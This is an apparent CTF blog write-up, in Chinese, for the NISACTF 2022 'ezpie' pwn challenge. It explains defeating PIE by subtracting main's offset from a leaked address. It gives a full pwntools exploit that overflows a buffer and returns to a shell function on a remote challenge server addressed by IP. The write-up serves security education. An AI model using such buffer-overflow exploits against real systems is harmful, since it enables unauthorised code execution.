[NISACTF 2022]ezpie wp

发布于 2023-01-21 | 标签: pie 、 PWN 、 CTF | 1分钟 | 140字数 | 浏览量::

此题32位开启了pie保护，程序在每次加载时都会重载地址，不能直接用ida中的地址
根据题目中提示，可以将泄露出的main地址减去offset求出基址进行求解

编写exp：

from pwn import *
context(log_level='debug',os='linux',arch='x86',terminal=['tmux','splitw','-h'])

# io=process("./ezpie")
io=remote("1.14.71.254",28585)
elf=ELF("./ezpie")
io.recvline()
base_addr=int(io.recvline(),16)-elf.sym[b"main"]
# gdb.attach(io)
# pause()
payload=cyclic(0x2c)+p32(base_addr+elf.sym[b"shell"])
# payload=cyclic(0x2c)+p32(base_addr+elf.sym[b"shell"])
io.sendline(payload)
io.interactive()

本文作者： WIN_250
本文链接： https://oraclepi.tech/post/EY_VxI0x6/
版权声明： 本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！

# pie # PWN # CTF

[GFCTF 2021]where_is_shell wp 上一篇

[CISCN 2019东北]PWN2 wp 下一篇

[NISACTF 2022]ezpie wp

感谢您的支持，我会继续努力的!